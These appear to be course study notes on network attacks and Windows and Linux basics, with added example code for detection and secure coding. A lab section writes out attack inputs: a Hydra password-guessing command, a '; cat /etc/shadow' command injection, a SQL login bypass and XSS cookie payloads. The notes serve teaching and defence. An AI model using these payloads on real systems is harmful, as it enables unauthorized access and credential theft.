          7. Password attack tools: Cain and Abel, John the Ripper, OphCrack, and L0phtCrack;
          8. Approaches:
            1. Lock the account or increase the delay between login attempts;
            2.  two-factor authentication
        2. Pass-the-Hash Attacks
          1. Windows / Cisco devices store hashed passwords and compare them with the hash of the user's login;
          2. use the password hash itself to authenticate to a remote system;
          3. Salting adds random data to the password before hashing it, and then stores that salt value along with the hash;
          4. Rehashing (iterating the hash) makes the hash harder to crack;
          5. Rainbow table: precomputed table of password hashes;
          6. NTLM (NT Lan Manager)
          7. Tools: MetaPilot, PS Exec, MSVCTL, PSH Toolkit;
          8. Countermeasures:
            1. Block inbound connections on workstations;
            2. Restrict and protect admin accounts;
        3. DNS-based Attacks
          1. DNS cache poisoning attacks
            1. Open DNS resolvers: answer recursive queries from anyone
            2. non-recursive
            3. Resource Records (RR): 32bit TTL
          2. DNS amplification and reflection attack: DDoS
            1. reduce by:
              1. upstream providers filters packets from downstream customers;
              2. discard packets with IP address not belonging to customer;
          3. DNS resource utilization attack
            1. CPU / memory / socket buffers -> system reboot
          4. Techniques such as:
            1. fast flux: numerous IP addresses associated with a single fully qualified domain name, changed with extremely high frequency; used by botnets;
              1. hides the malicious server from being detected and results in the defenders being unable to find a single point to focus their efforts
            2. double IP flux
            3. domain generation algorithms (DGA): generate a different domain name in every iteration;
              1. Botnets
            4. Countermeasures
              1. Monitor the DNS log for suspicious activities such as DNS queries with long randomly generated domain
              2. Deploy a solution, such as Cisco OpenDNS: collect data and predict;
          5. Countermeasures: do not run open resolvers; capture and log DNS data; do not use non-authoritative DNS servers;
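The DGA countermeasure above ("monitor the DNS log for long, randomly generated domains") as detection logic over sample log lines, added here as an example that is not from the course notes. The log line format, the names, the feature thresholds and the per-client hit count are all my own constructions; the scoring is a heuristic, not a product's algorithm.

```python
import math
import re
from collections import Counter

# Constructed query-log lines (not a real BIND or OpenDNS format).
SAMPLE_LOG = [
    "2017-10-14T10:00:01 client 10.0.0.5 query: www.cisco.com",
    "2017-10-14T10:00:02 client 10.0.0.5 query: xq7zk3vtwr9pb.com",
    "2017-10-14T10:00:02 client 10.0.0.5 query: lmnhgtrwqpzxcv.net",
    "2017-10-14T10:00:03 client 10.0.0.5 query: b8k2t9r3qw7m1z.org",
    "2017-10-14T10:00:03 client 10.0.0.5 query: kjhgfdsazxcvbn.info",
    "2017-10-14T10:00:04 client 10.0.0.9 query: mail.google.com",
    "2017-10-14T10:00:05 client 10.0.0.9 query: zxqwvtkr.com",
    "2017-10-14T10:00:06 client 10.0.0.9 query: update.microsoft.com",
    "this line is not a query record and is skipped",
]

LOG_RE = re.compile(
    r"^(?P<ts>\S+) client (?P<ip>[\d.]+) query: (?P<name>[\w.-]+)$"
)


def shannon_entropy(text):
    """Bits per character; a label built from many distinct characters
    scores high, ordinary words score low."""
    counts = Counter(text)
    total = len(text)
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def registrable_label(name):
    """The label a DGA chooses; toy rule takes the label left of the TLD
    (a real tool would consult the public suffix list)."""
    parts = name.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(name):
    """Count of 'looks machine-generated' features (thresholds are my own)."""
    label = registrable_label(name)
    length = max(len(label), 1)
    score = 0
    if len(label) >= 12:
        score += 1  # long
    if shannon_entropy(label) >= 3.5:
        score += 1  # many distinct characters
    if sum(ch in "aeiou" for ch in label) / length < 0.25:
        score += 1  # unpronounceable
    if sum(ch.isdigit() for ch in label) / length > 0.3:
        score += 1  # digit-heavy
    return score


def find_suspicious_clients(log_lines, threshold=2, min_hits=3):
    """Clients with at least min_hits queries scoring >= threshold; one odd
    name is noise, a burst of them is the DGA pattern worth a ticket."""
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if m and dga_score(m["name"]) >= threshold:
            hits[m["ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    print(find_suspicious_clients(SAMPLE_LOG))
```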
        4. DNS Tunneling
          1. Bot vs Botnet (receive CnC by the hacker)
            1. stealthy data exfiltration
            2. issue CnC traffic to bots on the network
          2. Block suspicious outbound connection
          3. Inspect and filter DNS, especially long DNS query;
            1. DNS replies from the cyber criminal's server contain malicious code;
          4. Encoding methods include Base32 and Base64 encoding to avoid detection in DNS tunnel;
        5. Web-based Attacks
          1. Process “Drive-by Download“: infects a victim’s machine simply when the victim visits a website that is running malicious code;
            1. exploit kit scans the victim’s machine software such as the operating system, browser, Flash player, PDF player, or Java to find a security vulnerability that it can exploit. A web-based exploit kit typically uses a PHP script, and provides a management console to enable the cybercriminals to manage the attacks
          2. Angler Exploit Kit: associate many ransomware incidents
            1. Malvertising
          3. Pre-Click Malware
          4. Post-Click Malvertising
          5. Countermeasures
            1. Best security practices for web development
            2. OS, Browser updates
            3. web proxy
            4. Cisco OpenDNS
            5. Educate end users
        6. Malicious iFrames
          1. webpage within a webpage;
          2. attackers obfuscate the JavaScript
          3. detect iFrames within the HTTP packet
          4. Countermeasures
            1. Review packet through WireShark
            2. Not to use iFrames to embed in development
            3. Cisco OpenDNS: block the users from accessing malicious web sites
            4. Web Proxy block users from accessing malicious web sites
            5. Education
        7. HTTP 302 Cushioning
          1. HTTP response status code 302 Found is a common way of performing URL redirection
          2. Goals of HTTP 302 cushioning / iFrame: redirect to attacker’s site;
          3. CounterMeasures
            1. Secure solution of Web Proxy
            2. Education
        8. Domain Shadowing (with HTTP cushioning)
          1. steal domain account credentials > create sub-domains > redirect users;
            1. huge numbers of sub-domains, each short-lived
          2. Countermeasures
            1. secure accounts with strong authentication
            2. verify domain account periodically
        9. Command Injections
          1. vulnerable, unsafe input fields; due to insufficient input validation;
          2. SQL injection and XSS
          3. Countermeasures
            1. IPS solution to detect and prevent injections
            2. developers should follow the best practices to perform proper user input validation
        10. SQL Injections
          1. Countermeasures
            1. Application developers should follow the best practices to perform proper user input validation, constrain, and sanitize the user input data
        11. Cross-Site Scripting (XSS) and Request Forgery
          1. XSS: injected scripts steal sensitive data from the user's cookies
          2. steal cookies
          3. Countermeasures
            1. OWASP CSRF prevention cheat sheet for the web application developers to follow:
            2. Educate end users—for example, how to recognize phishing attacks
        12. Email-based Attacks
          1. Homoglyphs are text characters that have shapes which are identical or similar to each other
        13. Explore Network Application Attacks
          1. By default, tail displays the last 10 lines in the file;
          2. Crack hash by John the Ripper in Linux
            1. john root.shadow.txt
            2. john root.shadow.txt –show
          3. use the tool Hydra to perform an online password attack
            1. hydra -l admin -P /usr/share/wordlists/metasploit/unix_passwords.txt http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In" -V
            2. ./
            3. online password attack at /var/log/apache2
          4. Command injection
            1. get root hash and use John: ; cat /etc/shadow
          5. Perform an SQL injection
            1. using the string ' or 1=1 -- <space> in the Name field; it changes the query to an OR from an AND (which requires two conditions to match); the double dash (--) indicates that the rest of the query is a comment and should be ignored by the SQL parser
              1. ' or 1=1 -- <space> (especially for username).

                SELECT * FROM accounts WHERE username='' or 1=1 -- ' AND password='Presley' ->

                SELECT * FROM accounts WHERE TRUE
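The bypass above run against a constructed accounts table, next to the parameterized form the countermeasure sections call for, as an added example that is not from the lab (it uses an in-memory SQLite database rather than the lab's server). With string concatenation the payload turns the WHERE clause into "username='' or 1=1" and comments out the password check; with bound parameters it is just a username nobody has.

```python
import sqlite3


def make_db():
    """Constructed accounts table mirroring the lab's SELECT statement."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("admin", "Presley"), ("wendy", "s3cret")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds SQL by string concatenation, so the input is parsed as SQL:
    the -- in the payload comments out the AND password=... clause."""
    query = ("SELECT username FROM accounts WHERE username='" + username
             + "' AND password='" + password + "'")
    return sorted(row[0] for row in conn.execute(query))


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the payload is only a value."""
    query = "SELECT username FROM accounts WHERE username=? AND password=?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


PAYLOAD = "' or 1=1 -- "   # the string from the lab, with the trailing space


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("parameterized:", login_parameterized(db, PAYLOAD, "wrong"))
```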

            2. Account access via cookie manipulation
              1. Cookie, small text file describing tags and values and is stored in browser’s data files. It can offload the need to store data on the server.
              2. facilitation of website customization themes, browsing history, and shopping carts;
              3. change value in cookie manager in Google Chrome;
            3. Explore reflected XSS
              1. Input JavaScript to test if vulnerable to reflected XSS:
                1. alert(“This is a test!”)
                2. alert(document.cookie)
            4. Explore persistent XSS
              1. when any other user views this blog entry, their cookie information will be harvested
        14. Challenge
      8. Understanding Windows Operating System Basics
        1. Windows OS history
          1. National Vulnerability Database.
        2. Windows OS architecture
          1. user mode: processes operate at lower system privileges than kernel mode processes to maintain the separation (protected memory space);
            1. Non-service processes (initiated by user activity, eg. logon services & smss)
            2. Service processes
            3. User applications
            4. OS environment support
          2. kernel mode:
            1. with the highest level of privilege so it can manage system CPU and memory resources;
            2. share the same memory space;
            3. To mitigate misbehaving processes, kernel-mode code signing requires that drivers and critical system files be signed with a cryptographic key from a public CA;
        3. Windows processes, threads, and handles
          1. applications: contains multiple process
          2. processes: contains multiple threads
          3. threads: the system allocates processor time to threads
          4. objects: represents a resource
          5. handles: a pointer used to access objects / resources
        4. windows virtual memory address space
          1. paging files: to hold virtual memory
            1. page table translates virtual addresses to physical addresses (paging file on the HDD)
          2. size of the total addressable virtual memory space depend on: Windows version is 32-bit or 64-bit;
        5. Windows services
          1. long-running executable applications that run in their own Windows sessions;
          2. Services Control Manager
        6. Windows file system overview
          1. File Allocation Table (FAT): file-size limitation, in USB media;
          2. HFS+, used on MacOS, enable long file names;
          3. Extended File System (ext): Linux, ext4; additional software needed for reading in Windows;
          4. New Technology File System (NTFS), supported by Windows and Linux, read-only in macOS;
            1. NTFS alternate data streams
              1. echo "My ADS data." > myFile.txt:ADStest
              2. a way to hide data
              3. not easily visible
              4. difficult to detect
          5. partition boot sector occupies the first 16 sectors of the drive; points to the system bootstrap instructions and the location of the Master File Table (MFT)
        7. Windows file system structure
          1. file system paths, eg. (fully qualified path) C:\….
          2. base file name and file extension (determine application needed)
        8. Windows domains and local user accounts
          1. AD is a type of LDAP
        9. Windows graphical user interface
          1. start menu / quick launch icons / notification area / windows file explorer;
        10. Run as administrator
        11. Windows command line interface
          1. command options or parameters are prefixed with "/"
        12. Windows Powershell
          1. PowerShell scripts: sequences of PowerShell commands
          2. PowerShell functions: accept parameters; code snippets;
          3. Rich scripting environment
          4. Power shell environment
          5. object oriented language based on .NET framework
          6. bulk and repetitive operations / task automation
          7. aliases in powershell
          8. >start powershell
            1. Get-Service | Out-GridView
          9. import-module
          10. four PowerShell execution policy elements
            1. Restricted: completely restricts the use of PowerShell scripts on the system
            2. AllSigned: any script to execute must be digitally signed
            3. RemoteSigned: besides locally created, externally downloaded scripts must be digitally signed
            4. Unrestricted: no restrictions on running PowerShell scripts
          11. cmdlets: programs that are designed to interact with PowerShell
        13. Windows net command
          1. net help
          2. net config
          3. net use: mount file share
          4. net start: start a service
          5. net share
        14. Controlling startup services and executing system shutdown
          1. msconfig: system configuration
        15. Controlling services and processes
          1. task manager
          2. msconfig
        16. Monitoring system resources
          1. resmon.exe
        17. Windows boot processes
          1. BIOS (newer type EFI / UEFI)
            1. firmware identifies and initializes the hardware devices
            2. Runs POST
            3. Detects a valid system disk
            4. Reads MBR
            5. Starts bootmgr.exe
            6. Bootmgr.exe starts Winload.exe: program queries the system BIOS to get information about devices connected to the system
          2. OS Loader
            1. Loads essential system drivers
            2. Initializes the system
            3. Kernel begins executing
          3. OS Initialization
            1. Kernel initialization
            2. Plug and Play activity
            3. Service Start
            4. Logon
            5. Desktop initialization
          4. Registry hives
            1. HKEY_LOCAL_MACHINE: more vulnerable to be modified
            2. HKEY_CURRENT_USER
        18. Windows networking
          1. ping / nslookup / netstat
        19. Windows netstat command
          1. command line network utility
          2. netstat -r: routing info
          3. netstat -ans: -s for per-protocol statistics
          4. netstat -e: displays ethernet statistics
          5. netstat -p: protocol acronym
          6. netstat -abno: display processes listed in Task Manager with PID;
          7. netstat -pnob TCP: p for ports; n for addresses; o for owner process ID; b for executable involved;
        20. Accessing network resources with Windows
          1. net use to mount network resources
          2. UNC format: \\servername\sharename\file
          3. SMB worm: using file sharing
          4. NetBIOS are used to uniquely identify the servers hosting the remote resource
        21. Windows Registry (regedit.exe)
          1. hive: highest element of the hierarchy, store specific types of info.;
            1. HKEY_CURRENT_USER (HKCU): Stores data that is associated with the currently logged in user
            2. HKEY_USERS (HKU): Stores information about all the user accounts on the host
            3. HKEY_CLASSES_ROOT (HKCR): Stores information about file associations and object linking and embedding (OLE) registrations
            4. HKEY_LOCAL_MACHINE (HKLM): Stores system-related information
            5. HKEY_CURRENT_CONFIG (HKCC): Stores information about the current hardware profile
          2. central hierarchical database
          3. to configure the system for one or more users, applications, and hardware devices
          4. Registry keys are container objects
            1. REG_BINARY: numbers or Boolean values (on or off)
            2. REG_DWORD: Stores numbers greater than 32 bits or raw data
            3. REG_SZ: Stores string values in Unicode format.
        22. Windows Event Logs
          1. run as administrator
          2. eventvwr.exe
        23. Windows Management Instrumentation (WMI)
          1. a set of specifications for consolidating the management of devices and applications in a network
          2. most useful in enterprise applications and administrative scripts
            1. to retrieve the Windows user log in and log off security events from the Windows domain controller
          3. proper Windows guidelines to secure the WMI access
        24. Common Windows server functions
          1. DNS / DHCP /AD
        25. Common 3rd party tools
          1. PuTTy: remote access, ssh connection
          2. WinSCP: transfer files
          3. WireShark: capture traffic
          4. Sysinternals: contains 70 tools (administrator privilege)
            1. Process Explorer
            2. Process Monitor (ProcMon): reports and monitors attempts to access the Windows registry; VirusTotal check function
            3. TCPView shows processes that are communicating with other hosts
        26. Explore the Windows OS (lab)
          1. A process must contain at least one thread
          2. Windows application / malware developers need to understand processes, threads, handles, and the registry
          3. netstat -a | find "EST"
            1. tasklist | find "5556"
        27. Challenge
      9. Understanding Linux Operating System Basics
        1. History and benefits of Linux
          1. Linus Torvalds
          2. GNU public licensing
        2. Linux Architecture
          1. Linux kernel, heart of OS
          2. Distributions: application packages from different brands
          3. Abstraction: provides interfaces to each layer; how a layer works internally is hidden from the other layers
            1. Benefits of abstraction:
              1. simplifies software design because developers do not have to worry about how to interact with aspects already handled by other software components;
              2. Access to the inner workings of a layer is limited to what the layer’s interface provides for communication;
          4. User space:
            1. Components: GUI / User Applications / Command Line Interface / Services;
            2. describes the system memory made available to run user processes;
            3. Interaction between the kernel and user space is performed through function calls and programming interfaces;
          5. Kernel space: System Calls / Process Management / Device Drivers / Memory Management;
            1. A section of the system’s main memory is reserved for the kernel to use;
              1. manages the memory allocations for each running process
              2. determines which processes can access the CPU;
              3. interface between the user-space processes and the hardware
          6. hardware: Main Memory / Network Hardware / CPU / Disks
            1. kernel communicates with system hardware through device drivers;
            2. Kernel:
              1. maps the virtual address space of the process to the physical address space of the main memory
              2. must load and unload special memory locations within the CPU, called registers;
                1. used for extremely fast computation and storage;
                2. context switching is implemented to temporarily unload the registers;
        3. Linux file system overview
          1. /tmp: Stores temporary files and used as a workspace by applications; store malware by attackers, often as the first stage of an attack;
          2. /home: contain private and sensitive personal information (like configuration files with password, SSH private identity keys, and user files);
          3. /dev, concept of devices being represented as files
            1. Block: devices that process data in fixed chunks, eg. storage devices;
            2. Character: devices that work with data streams, eg. /dev/null or printers;
            3. Pipe / "named pipe": data stream is directed to another process;
            4. Sockets: not usually found in /dev, used for interprocess communication such as network communication
            5. ls -la in /dev: c for character type, b for block type
          4. /usr: store user-space programs and data;
          5. application execution: ./new-app
          6. cd ~: ~ represents the current user's home directory
          7. Fully Qualified VS Relative File Reference
            1. relative reference lets you specify a location relative to some starting point other than root;
        4. Basic file system navigation and management commands
          1. commands:
            1. cd: change directory
              1. pwd to display present location;
            2. cp: copy
            3. mv: move
        5. File properties and permissions
          1. ls -l
            1. 1st character: - for regular file; d for directory; c for character, b for block;
            2. Permissions: 9 characters: first set for user, 2nd for group, 3rd for all others;
            3. Links: number of hard links to the file; for directories, the number of directories it contains, including the current directory (.) and the parent directory (..)
            4. r for read; w for write; x for execute;
            5. Linux treats file permissions as a hierarchy. For example, without execute permission on a directory, you cannot open the files inside it;
        6. Editing file properties
          1. chmod 766 <filename>: rwxrw-rw-
          2. chmod u+r MyFile.txt
          3. chmod ug+rw MyFile.txt
          4. chmod go+r-w MyFile.txt
          5. chmod a=r MyFile.txt
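Added example (not from the course or these notes): a small POSIX sh helper that converts the ls -l permission string into the octal form chmod takes, reads a file's current mode, and flags world-writable files; the 766 above is one, since "other" gets write access.

```shell
#!/bin/sh
# Added example, not from the course notes. Turns the nine-character
# permission field of "ls -l" into the octal that chmod takes, reads a
# file's current mode, and flags world-writable files.

# perm_octal rwxrw-rw- -> 766   (r=4, w=2, x=1 for user, group, other)
perm_octal() {
    perms=$1
    [ "${#perms}" -eq 9 ] || { echo "perm_octal: expected 9 characters" >&2; return 1; }
    result=""
    start=1
    while [ "$start" -le 7 ]; do
        triplet=$(printf '%s' "$perms" | cut -c"$start-$((start + 2))")
        digit=0
        case $triplet in r??) digit=$((digit + 4)) ;; esac
        case $triplet in ?w?) digit=$((digit + 2)) ;; esac
        # s (setuid/setgid) and t (sticky) also mean the execute bit is set;
        # the special bits themselves are ignored by this helper
        case $triplet in ??[xst]) digit=$((digit + 1)) ;; esac
        result="$result$digit"
        start=$((start + 3))
    done
    printf '%s\n' "$result"
}

# file_mode <path> -> the nine permission characters, e.g. rw-r--r--
file_mode() {
    ls -ld "$1" | cut -c2-10
}

# world_writable <path> -> exit 0 if "other" has write permission
world_writable() {
    case "$(file_mode "$1")" in
        ???????w?) return 0 ;;
        *)         return 1 ;;
    esac
}

# Demo on a temporary file, mirroring "chmod 766 <filename>: rwxrw-rw-"
demo_file=$(mktemp)
chmod 766 "$demo_file"
mode=$(file_mode "$demo_file")
echo "$demo_file: $mode = $(perm_octal "$mode")"
if world_writable "$demo_file"; then
    echo "world-writable: any local user can modify this file"
fi
rm -f "$demo_file"
```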
        7. Root and sudo
          1. granular basis / logging
          2. sudo vi /etc/hosts: prompted for password and a five-minute session;
        8. Disks and File Systems
          1. Partition tables contain the code that is required to boot a host and they outline where disk partitions start and end; (apps eg. parted, gparted, fdisk, and gdisk)
          2. MBR is limited to four partitions on a disk; a disk may only have one MBR;
          3. GPT removes limitations on disk size and number of partitions; and replicates to backup partitions;
          4. sudo parted -l
            1. list partition table information
          5. Extended File System (ext): native for Linux; latest at ext4;
          6. FAT: older Microsoft and USB storage devices;
          7. ISO 9660 and JOLIET: file system std for optical media;
          8. HFS+: file system for Apple systems running OS X;
          9. Swap
          10. /etc/fstab
            1. UUID for tracking instead of device name
          11. mount -t <file type> <device name> <mount point>
        9. System Initialization
          1. General boot process
            1. Hardware checks (H)
            2. Device bus discovery (D)
            3. Device discovery (D)
            4. Kernel sub-system initializes (K)
            5. Root file system mounts (R)
            6. Start user processes (U) 
          2. boot loader (interact with BIOS / UEFI)
            1. BIOS/UEFI finds the boot loader, which locates the kernel on the startup disk and loads it into memory
              1. LILO
              2. GRUB
            2. /proc/cmdline: BOOT_IMAGE=
          3. Initialization process
            1. System V init: init
              1. use /etc/inittab
            2. Systemd: newer and become as standard
              1. benefits: it can control other initialization behaviors such as mounting file systems and start in parallel;
              2. use /etc/systemd
          4. Run Levels: 0 to 6
            1. Each level is a directory that contains start and stop scripts; S for startup scripts and K stands for stopping scripts; eg. rc.1
            2. Level 0: halts
            3. Level 1-2: reserved
            4. Level 3: starts without GUI
            5. Level 5: starts with GUI
        10. Emergency/Alternate Startup Options
          1. Single User (Level 1)
            1. boots files from disk; thus not suitable when the system has been compromised or for forensic purposes;
            2. Enter Single user mode in GRUB
              1. left shift key
              2. select desired kernel with recovery option;
          2. Live CD: for a compromised system, or when a forensic analysis is needed
        11. Shutting Down the system
          1. command
            1. shutdown
              1. -h for halt
              2. -r for reboot
              3. hh:mm as 24-hour format
              4. +m for number of minutes from the command was issued
              5. now
            2. systemctl: for systemd
              1. systemctl poweroff
              2. systemctl reboot
        12. System Processes
          1. Processes
            1. PID
            2. Process thread, component of a process, unit that is capable of sharing the resources that are allocated to a process;
            3. Single-threaded process: composed of one thread
            4. Multi-threaded process: consists of more than one thread
              1. run in parallel
              2. TIDs
          2. Linux process creation
            1. fork-and-exec mechanism
              1. When a (parent) process makes a fork call, a new (child) process with a new PID is created;
              2. the child process then makes an exec call, which replaces the process image with an entirely new program;
            2. The parent process receives the PID of the child process from the fork call, while the child process receives 0;
            3. Monitoring
              1. top
                1. 1st line: load of CPU in 1, 5, 15 minutes;
                2. 3rd row: CPU utilization. us for user-space processes; sy for system/kernel processes;
                3. NI as nice value. -20 (highest) to 20.
                4. Status: Z (zombie process) completed processes but not yet removed from kernel’s process table;
              2. ps
                1. -f for detailed information
                2. -e for all user processes
                3. -ef for the options -e and -f combined
                4. -fC sshd for filtering process that is related to sshd;
                5. ps -ef | grep ssh.*
              3. lsof: list the files / folders that are currently open in the system (need Superuser privilege)
                1. sudo lsof /var/log/syslog: know which processes are using the syslog;
                2. sudo lsof +D /var/log: list the processes that are accessing log files in a directory;
                3. sudo lsof -p 892: specify a PID number;
                4. sudo lsof -i TCP -s TCP:LISTEN
              4. vmstat 2 (every 2 seconds) for virtual memory
              5. iostat 2 for I/O resources
        13. Interacting with Linux
          1. GUI: X11 / X environment
            1. Gnome / KDE / Mate / XFCE: desktop layouts, usages and widgets of UX;
          2. Shell
            1. bash (Bourne-Again shell) – oldest, and broadest compatibility; most widely used;
            2. ksh (Korn shell)
            3. csh (C shell)
        14. Linux command shell concepts
          1. Environment variables and Shell variables
            1. Environment variables: available system wide; view all by env;
            2. Shell variables: only available in the current shell; create shell variables at any time;
              1. $ MYVAR="abc123"
              2. $ echo $MYVAR
              3. Shell variables can be made available to other shells (child processes) by using the export command;
            3. $PATH:  locations searched for commands you wish to execute
          2. General command structure
            1. . (single dot): Represents the current directory which is also known as a self-referential directory, especially for file execution;
          3. STDIN, STDOUT, and STDERR
            1. cat: cat > test.txt (type "this is a test", then Ctrl-D to finish)
            2. echo: echo $PATH > path.txt
            3. echo “add more” >> path.txt
            4. cat myfile.txt 2> file_output.log
              1. contents of myfile.txt will be displayed on the terminal;
              2. Any errors associated with displaying the file are sent to file_output.log, because the number 2 references the STDERR stream;
        15. Piping command output (|)
          1. piping output to next command instead of STDOUT
          2. running multiple commands
            1. ./configure && make && make install: execute in sequence, each only if the previous one succeeded;
        16. Other Useful command line tools
          1. history
            1. !<n>: execute line number n from history, eg. !735
            2. !!: the last command that you ran.
            3. sudo !!
          2. less (f for forward one page; b for backward one page; / for search; q to quit)
          3. history | less
          4. awk: text processing
            1. eg. ps -ef | grep ssh | awk '{print $1 "\t" $2 "\t" $8}'
          5. sed: stream editing tool that performs the action you configure on lines of text
            1. string substitutions
            2. eg. echo "left" | sed -e 's/left/right/'
            3. Lines deletion:
              1. sed -e '1d ; 3d' names.txt
              2. sed -e '1,3d' names.txt
              3. sed -e '/mr/d' names.txt
            4. Delete blank lines
              1. sed -e '/^$/d' names.txt
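Added example (not from the course or these notes) that applies the grep/awk/sed idioms above to a few constructed sshd and sudo lines in /var/log/auth.log format (RFC 5737 test addresses, invented PIDs): failed logins per source address, blank-line and PID clean-up with sed, and the commands run through sudo.

```shell
#!/bin/sh
# Added example, not from the course notes. The log lines below are
# CONSTRUCTED in the auth.log format; addresses are RFC 5737 test nets.

write_sample_log() {
    cat > "$1" <<'EOF'
Oct 14 09:12:01 host1 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Oct 14 09:12:03 host1 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 51023 ssh2
Oct 14 09:12:09 host1 sshd[2205]: Failed password for root from 203.0.113.5 port 51030 ssh2
Oct 14 09:13:44 host1 sshd[2210]: Accepted publickey for alice from 198.51.100.7 port 40112 ssh2

Oct 14 09:15:02 host1 sshd[2218]: Failed password for root from 198.51.100.9 port 40200 ssh2
Oct 14 09:15:10 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/vi /etc/hosts
EOF
}

# failed_by_source <log> -> "<ip> <count>" per source, busiest first.
# awk walks the fields and prints the word after "from", so the position
# of the address does not matter (the "invalid user" lines have extra fields).
failed_by_source() {
    grep 'Failed password' "$1" \
      | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $2, $1 }'
}

# clean_log <log> -> the log without blank lines and without the "[pid]"
# after the process name (the sed idioms from the notes: /^$/d and s///).
clean_log() {
    sed -e '/^$/d' -e 's/\[[0-9]*\]:/:/' "$1"
}

# sudo_commands <log> -> the COMMAND= value of each sudo line
sudo_commands() {
    sed -n 's/.*COMMAND=//p' "$1"
}

# Demo
log=$(mktemp)
write_sample_log "$log"
echo "failed logins by source:"; failed_by_source "$log"
echo "sudo commands:"; sudo_commands "$log"
echo "lines after clean-up: $(clean_log "$log" | wc -l | tr -d ' ')"
rm -f "$log"
```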
          6. vi:
            1. command mode
              1. w for write
              2. q for quit
              3. ! to override the warning
              4. :wq for write and quit
              5. Delete
                1. dd to delete the entire line
                2. dw to delete a word from the cursor location
              6. Copy/paste
                1. yy for yank a line
            2. insert mode: Esc to exit
          7. nano: simple and easy text editor
        17. overview of secure shell protocol
          1. ssh <username>@<remote host>
            1. exit
          2. SCP (Secure Copy Protocol) over SSH
        18. networking
          1. ifconfig -a
            1. lo for loopback interface
          2. netstat -rn,  displays the routing table with numeric IP addresses
          3. ping / ssh
        19. managing services in SysV environments
          1. “bouncing” the service:  stop and start the service so the updated configurations can be read;
            1. Systemd
              1. ps -ef | grep ftp
              2. sudo service vsftpd stop / start / restart
              3. systemctl
                1. sudo systemctl start vsftpd
                2. reload without restart.
                  1. sudo systemctl reload vsftpd
            2. old
              1. sudo ./cups restart (run from /etc/init.d)
        20. viewing network traffic
          1. lsof: list of open files / connections;
          2. netstat
            1. -t: show TCP connections
            2. -l: show connection in a listening state
            3. -n: displays hostnames and ports numerically
            4. -p: identifies the associated processes
            5. -6: IPv6 connections
        21. Name Resolution: DNS
          1. /etc/resolv.conf
          2. /etc/hosts: the first name resolution mechanism, later replaced by DNS
          3. /etc/nsswitch.conf: configure where various elements of the operating system go to fetch the information they need such as user information,
        22. testing name resolution
          1. nslookup: a non-authoritative answer message means that the DNS server that gave you the response is not the authoritative server for the domain you looked up;
          2. whois retrieve detailed information about the owner of a registered IP 
        23. viewing network traffic
          1. tcpdump:
            1. capture specific traffic for passive analysis
            2. require root level permission
            3. eg. sudo tcpdump -i ens33 -Xnns 0 host <ip address>
              1. -i: interface
              2. -X: outputs in both hex and ascii
              3. -nn: outputs addresses and ports in numeric format;
              4. -s: snap length
            4. eg. sudo tcpdump -i ens33 -s 0 host <ip address> and port 21 -w capture.pcap
        24. System logs
          1. Syslogd / rsyslogd process
          2. /var/log/messages or /var/log/syslog
          3. Config files:
            1. /etc/syslog.conf or /etc/rsyslog.conf
          4. forward to a remote syslog server or SIEM tool
          5. Levels
            1. Debug
            2. Info
            3. Notice: some attention
            4. Warn
            5. Err: error condition
            6. Crit: critical condition
            7. Alert: requires immediate attention
            8. Emerg
        25. Configuring Remote syslog (port: 514)
          1. restart logging service after configuration change!!
          2. UDP: *.* @<remote host name or IP address>:<port>
          3. TCP: *.* @@<remote host name or IP address>:<port>
          4. *.emerg @<remote host name or IP address>:10514
          5. logger command
            1. logger command lets you manually make entries into log files
            2. logger -p <facility.level> -n <remote host> -P 10514 --udp "My logging test"
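Added example (not from the course or these notes): decoding the <PRI> header of a raw syslog message into facility.severity using the eight levels above (PRI = facility * 8 + severity), and generating the @ (UDP) / @@ (TCP) forwarding line; host and port values in the demo are placeholders.

```shell
#!/bin/sh
# Added example, not from the course notes. PRI = facility * 8 + severity
# (RFC 5424); severities 0-7 are the eight levels in the notes, from
# emerg down to debug.

severity_name() {
    case $1 in
        0) echo emerg ;;   1) echo alert ;;  2) echo crit ;;  3) echo err ;;
        4) echo warning ;; 5) echo notice ;; 6) echo info ;;  7) echo debug ;;
        *) echo "severity_name: bad severity '$1'" >&2; return 1 ;;
    esac
}

facility_name() {
    case $1 in
        0) echo kern ;;  1) echo user ;;    2) echo mail ;;      3) echo daemon ;;
        4) echo auth ;;  5) echo syslog ;;  6) echo lpr ;;       7) echo news ;;
        8) echo uucp ;;  9) echo cron ;;    10) echo authpriv ;; 11) echo ftp ;;
        1[2-5]) echo "facility$1" ;;                # reserved / system use
        1[6-9]|2[0-3]) echo "local$(($1 - 16))" ;;  # local0 .. local7
        *) echo "facility_name: bad facility '$1'" >&2; return 1 ;;
    esac
}

# decode_pri 34 -> auth.crit
decode_pri() {
    [ "$1" -ge 0 ] && [ "$1" -le 191 ] || { echo "decode_pri: PRI must be 0-191" >&2; return 1; }
    echo "$(facility_name $(($1 / 8))).$(severity_name $(($1 % 8)))"
}

# decode_line '<34>Oct 14 22:14:15 host1 su: ...' -> auth.crit
decode_line() {
    pri=$(printf '%s' "$1" | sed -n 's/^<\([0-9]\{1,3\}\)>.*/\1/p')
    [ -n "$pri" ] || { echo "decode_line: no <PRI> header" >&2; return 1; }
    decode_pri "$pri"
}

# forward_rule udp|tcp <host> <port> [selector] -> rsyslog action line
# (plain UDP is unacknowledged and easily spoofed; TCP at least detects loss)
forward_rule() {
    selector=${4:-"*.*"}
    case $1 in
        udp) echo "$selector @$2:$3" ;;
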